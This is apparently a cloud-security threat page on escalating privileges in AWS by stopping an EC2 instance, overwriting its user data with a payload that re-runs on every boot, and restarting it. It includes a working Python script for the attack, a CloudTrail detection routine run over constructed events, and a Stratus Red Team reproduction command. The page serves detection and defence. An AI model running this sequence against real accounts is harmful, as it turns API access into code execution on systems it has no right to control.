About
EC2 user data is a script (or cloud-init configuration) that runs automatically when an EC2 instance boots. An attacker with sufficient permissions (ec2:StopInstances, ec2:ModifyInstanceAttribute and ec2:StartInstances) can overwrite the user data of an existing EC2 instance so that it executes attacker-controlled commands on the next boot, turning API-level access into code execution on the instance and escalating their privileges.
Understanding Impact
Business Impact
When an attacker manages to execute malicious commands on an EC2 virtual machine, they can access sensitive data stored on it, use the credentials of its IAM instance profile, and run ransomware or other extortion attacks.
Technical Impact
An attacker first needs to stop the EC2 instance, because user data cannot be modified while the instance is running. They then modify its user data and start the instance again; the malicious commands are executed when it boots. Note that by default cloud-init runs user-data scripts only on an instance's first boot, so the payload is typically wrapped in a MIME multi-part that carries a #cloud-config part instructing cloud-init to run user scripts on every boot.
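The stop / modify user data / start sequence above, as an added example that is not Stratus Red Team's own code. It drives a boto3-style EC2 client; the client interface (stop_instances, get_waiter, modify_instance_attribute, start_instances), the instance ID and the script are assumptions for the example, and an offline RecordingClient stands in for boto3 so the block runs without AWS credentials. The MIME multi-part it builds adds a #cloud-config part that sets cloud_final_modules to run scripts-user always, which is the documented way to have user data re-run on every boot rather than only on the first one.

```python
"""Added example: overwrite an EC2 instance's user data with a payload that
re-runs on every boot. Not code from Stratus Red Team or the page; the
instance ID, script and client interface are assumptions for illustration.
"""
import base64
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# cloud-config fragment that makes cloud-init re-run user scripts on every boot
# (plain user-data scripts only run on the instance's first boot)
CLOUD_CONFIG = "#cloud-config\ncloud_final_modules:\n- [scripts-user, always]\n"


def build_user_data(script: str) -> bytes:
    """Return raw MIME multi-part user data: a cloud-config part plus a shell script part."""
    msg = MIMEMultipart()
    cfg = MIMEText(CLOUD_CONFIG, "cloud-config")      # Content-Type: text/cloud-config
    cfg.add_header("Content-Disposition", "attachment", filename="cloud-config.txt")
    msg.attach(cfg)
    sh = MIMEText(script, "x-shellscript")            # Content-Type: text/x-shellscript
    sh.add_header("Content-Disposition", "attachment", filename="script.sh")
    msg.attach(sh)
    return msg.as_bytes()


def escalate(ec2, instance_id: str, script: str) -> str:
    """Stop the instance, replace its user data, start it again.

    Returns the base64 form of the new user data (what the AWS CLI's
    --user-data argument would carry). boto3 base64-encodes the blob in
    UserData.Value itself, so the raw bytes are passed to the client.
    """
    ec2.stop_instances(InstanceIds=[instance_id])
    # ModifyInstanceAttribute(userData) is rejected while the instance is running,
    # so block until it is actually stopped
    ec2.get_waiter("instance_stopped").wait(InstanceIds=[instance_id])
    user_data = build_user_data(script)
    ec2.modify_instance_attribute(InstanceId=instance_id, UserData={"Value": user_data})
    ec2.start_instances(InstanceIds=[instance_id])    # the script runs on this boot
    return base64.b64encode(user_data).decode()


class RecordingClient:
    """Offline stand-in for boto3's EC2 client: records every call instead of
    talking to AWS. Any method name is accepted; get_waiter() returns self so
    that .wait() is recorded too."""

    def __init__(self):
        self.calls = []

    def __getattr__(self, name):
        def method(*args, **kwargs):
            self.calls.append((name, kwargs or {"args": args}))
            return self if name == "get_waiter" else {}
        return method


if __name__ == "__main__":
    client = RecordingClient()  # replace with boto3.client("ec2") for a real run
    # constructed instance ID and harmless marker script for the example
    b64 = escalate(client, "i-0123456789abcdef0", "#!/bin/bash\necho executed > /tmp/user-data-marker\n")
    for name, kwargs in client.calls:
        print(name, sorted(kwargs))
    print(len(b64), "base64 characters of user data")
```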
Detection
You can identify when an EC2 instance is stopped and its user data changed using the following CloudTrail events:
StopInstances. Note that the user data of an EC2 instance cannot be changed while it is running, so the attacker has to stop it first.
ModifyInstanceAttribute, when the field requestParameters.userData is not empty.
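The detection logic above run over sample CloudTrail records, as an added example that is not Datadog's rule or code from the page. It flags every ModifyInstanceAttribute whose requestParameters.userData is non-empty and notes whether a StopInstances for the same instance preceded it within a time window. The records are constructed for the example and trimmed to the fields used; the exact shape of userData in real ModifyInstanceAttribute events is an assumption (CloudTrail redacts its content), so both a plain string and a {"value": ...} object are accepted.

```python
"""Added example: correlate StopInstances and ModifyInstanceAttribute(userData)
CloudTrail events per instance. Not Datadog's detection rule; the sample
events below are constructed and the userData field shape is an assumption.
"""
import json
from datetime import datetime, timedelta, timezone

WINDOW = timedelta(minutes=30)  # how long after a stop a user-data change is still linked to it

# Constructed CloudTrail records (not real logs), trimmed to the fields used here.
SAMPLE_EVENTS = json.loads("""[
 {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "ec2.amazonaws.com", "eventName": "StopInstances",
  "userIdentity": {"arn": "arn:aws:iam::123456789012:user/attacker"},
  "requestParameters": {"instancesSet": {"items": [{"instanceId": "i-0123456789abcdef0"}]}, "force": false}},
 {"eventTime": "2024-05-01T10:02:00Z", "eventSource": "ec2.amazonaws.com", "eventName": "ModifyInstanceAttribute",
  "userIdentity": {"arn": "arn:aws:iam::123456789012:user/attacker"},
  "requestParameters": {"instanceId": "i-0123456789abcdef0", "userData": {"value": "<sensitiveDataRemoved>"}}},
 {"eventTime": "2024-05-01T10:03:00Z", "eventSource": "ec2.amazonaws.com", "eventName": "ModifyInstanceAttribute",
  "userIdentity": {"arn": "arn:aws:iam::123456789012:user/admin"},
  "requestParameters": {"instanceId": "i-0fedcba9876543210", "instanceType": {"value": "t3.large"}}}
]""")


def _ts(rec):
    return datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def _user_data_present(params) -> bool:
    """True when requestParameters.userData carries anything (string or {"value": ...})."""
    ud = params.get("userData")
    if isinstance(ud, dict):
        ud = ud.get("value")
    return bool(ud)


def _stopped_instance_ids(params):
    """StopInstances lists targets under requestParameters.instancesSet.items[].instanceId."""
    items = (params.get("instancesSet") or {}).get("items") or []
    return [i["instanceId"] for i in items if "instanceId" in i]


def detect(records):
    """Return one finding per user-data modification, in event-time order."""
    last_stop = {}   # instanceId -> time of the most recent StopInstances
    findings = []
    for rec in sorted(records, key=_ts):
        if rec.get("eventSource") != "ec2.amazonaws.com":
            continue
        params = rec.get("requestParameters") or {}
        if rec["eventName"] == "StopInstances":
            for iid in _stopped_instance_ids(params):
                last_stop[iid] = _ts(rec)
        elif rec["eventName"] == "ModifyInstanceAttribute" and _user_data_present(params):
            iid = params.get("instanceId")
            stop_time = last_stop.get(iid)
            preceded = stop_time is not None and _ts(rec) - stop_time <= WINDOW
            findings.append({
                "instanceId": iid,
                "actor": rec.get("userIdentity", {}).get("arn"),
                "eventTime": rec["eventTime"],
                # a stop shortly before the change matches the full attack sequence
                "preceded_by_stop": preceded,
                "severity": "high" if preceded else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(json.dumps(f))
```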
Reproduce the attack
You can easily reproduce this attack in a self-contained manner with Stratus Red Team using the following command:
stratus detonate aws.execution.ec2-user-data
See also the related documentation.
How Datadog can help
Cloud SIEM
Datadog Cloud SIEM detects this attack using the out-of-the-box rule "Possible AWS EC2 privilege escalation via the modification of user data".
References
Stratus Red Team - Execute Commands on EC2 Instance via User Data
stratus-red-team.cloud
Local Privilege Escalation: User Data
hackingthe.cloud
Run commands on your Linux instance at launch
aws documentation